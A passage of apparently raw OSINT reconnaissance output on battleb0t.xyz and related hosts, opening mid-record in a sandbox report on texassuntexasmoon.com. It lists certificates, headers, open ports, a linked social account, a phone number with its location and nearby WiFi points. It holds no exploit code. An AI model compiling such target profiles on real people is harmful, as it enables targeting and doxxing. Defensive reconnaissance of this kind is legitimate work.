[%APPDATA%\\Microsoft\\Windows\\Cookies\\ZR04WK0P.txt]- [targetUID: 00000000-00003544]\n Dropped file: "QMOFOY6E.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QMOFOY6E.txt]- [targetUID: 00000000-00003544]\n Dropped file: "2CHG6PLE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2CHG6PLE.txt]- [targetUID: 00000000-00003544]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httptexassuntexasmoon.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 
00000000-00002684]\n "ZR04WK0P.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZR04WK0P.txt]- [targetUID: 00000000-00003544]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "CabDD18.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabDD18.tmp]- [targetUID: 00000000-00002684]\n "QMOFOY6E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QMOFOY6E.txt]- [targetUID: 00000000-00003544]\n "2CHG6PLE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2CHG6PLE.txt]- [targetUID: 00000000-00003544]\n "NSPIFVH3.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\NSPIFVH3.txt]- [targetUID: 00000000-00002684]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DFE4194B9B6BD734DD.TMP" has type "data"- Location: [%TEMP%\\~DFE4194B9B6BD734DD.TMP]- [targetUID: 00000000-00003544]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_6C8601C4-5EA4-11ED-B0C0-080027B94385_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._61F8B973-5EA4-11ED-B0C0-080027B94385_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF8E353882B4B5390.TMP" has type "data"- Location: [%TEMP%\\~DFF8E353882B4B5390.TMP]- [targetUID: 00000000-00003544]\n "~DF0028BFD212D71DC5.TMP" has type "data"- Location: [%TEMP%\\~DF0028BFD212D71DC5.TMP]- [targetUID: 00000000-00003544]\n 
"_61F8B975-5EA4-11ED-B0C0-080027B94385_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003544]\n "~DFC34CEF82F4E6D534.TMP" has type "data"- Location: [%TEMP%\\~DFC34CEF82F4E6D534.TMP]- [targetUID: 00000000-00003544]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://texassuntexasmoon.com/"\n Pattern match: "http://texassuntexasmoon.com"\n Heuristic match: "texassuntexasmoon.com"\n Heuristic match: "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, 
u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/93 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63691cbfbd04344cc75ae66e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck | 34.74.170.74 |
| 2023-05-12 02:55:05 | Netblock Membership | No | Censys | 334 | 0 | 2 | 0 | None | 188.114.97.0/24 | 188.114.97.1 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c575ea9e94610e1-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webdisk.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 001wwang.github.io | 185.199.111.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Rock Chalk (Net ID: 00:01:95:08:D8:04) | 37.780462,-122.390564 |
| 2023-05-12 03:09:42 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 118.97.148.34.bc.googleusercontent.com | 34.148.97.118 |
| 2023-05-12 02:44:23 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.205): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/battleb0t?version=2 | battleb0t |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | github.io | github.io |
| 2023-05-12 02:45:02 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8002::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8002::153 |
| 2023-05-12 02:45:11 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.135.9', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.0.0/16', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 172.67.135.9 |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:80 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Good Times (Net ID: 00:02:2D:29:A2:94) | 34.0544, -118.244 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 23 21:32:58.351 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F9:02:68:04:DD:BD:03:2E:AE:18:AA:
AF:0D:3B:37:54:0B:65:42:08:02:43:59:39:EA:4E:E4:
74:9E:81:C9:7F:02:21:00:A3:06:40:AE:98:69:3E:CB:
1F:F6:11:FA:78:DC:13:53:6B:E1:77:75:9F:C2:16:A0:
DB:C3:04:86:97:E4:3C:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 23 21:32:58.367 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:7A:A2:EB:6D:CE:11:7A:04:E7:47:C4:C2:
44:9A:BB:45:2B:47:3C:26:06:C5:A4:73:04:05:59:C0:
EA:D7:C9:86:02:21:00:96:12:0C:16:C7:15:09:8E:8E:
23:55:5D:FF:D3:4D:29:B3:21:12:6C:94:18:E0:30:4E:
4A:D0:D6:81:62:80:25
Signature Algorithm: sha256WithRSAEncryption
54:a4:7f:41:90:b7:5a:58:4b:b5:6b:68:ea:db:5a:92:b3:b2:
5b:7b:19:af:8a:ab:f1:af:c0:c8:97:4c:34:bf:3f:32:11:7b:
ef:8b:7e:76:7a:87:16:2c:1f:d0:41:d1:c1:02:b1:37:57:af:
4c:2b:b8:7b:75:a1:66:6d:db:db:ab:82:a1:fd:0c:b1:09:1f:
f6:3b:6f:e4:40:6a:6c:5b:ef:1d:46:ef:b3:b7:e2:09:40:10:
a0:d1:48:3e:99:ab:85:a3:c4:4c:9c:38:4c:86:5d:05:6c:1b:
02:ea:8a:b9:cd:33:f5:2b:4f:92:81:81:2f:e1:d6:b3:a5:e1:
b8:f6:e8:c6:e4:af:f3:a4:96:e9:02:f8:de:c5:31:3b:03:6b:
a3:c1:43:ea:01:84:7b:d7:65:c2:7b:26:5b:45:8b:c9:00:4a:
bf:64:80:db:bc:e4:35:f5:31:8b:1a:49:c1:a9:b6:8d:8f:59:
62:4e:f9:b9:59:d2:7d:9b:3a:75:2f:82:0e:77:1f:fa:cc:3b:
4e:90:c2:ba:e9:1d:4c:b0:a0:53:8e:4b:72:4b:e7:12:e4:36:
5a:97:fc:6e:97:fc:a5:f5:76:de:6f:cd:f5:6d:3f:07:f6:75:
e6:97:55:45:a3:14:55:0c:ff:89:33:2c:76:5f:49:b1:2d:bb:
1e:69:4c:4d
|
| 2023-05-12 03:12:55 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Phoenix, US | +14806242598 |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | nwapi2.battleb0t.xyz |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 34.148.97.127 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 6 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:21 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:21 GMT", "cf-ray": "7c5f60688e300ce1-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:55:18 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1 | 46.101.229.70 |
| 2023-05-12 02:45:31 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.111.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2293641, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Payment request', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'9ee11d071cac91169efe1c0a71aadc337743e7b1dbe899b003476c340ed7ecf3', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'binance-btc.github.io', u'date': u'2018-06-28T12:07:20.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'https://binance-btc.github.io/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.111.153 |
| 2023-05-12 02:53:42 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.109.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:10:83) | 37.780462,-122.390564 |
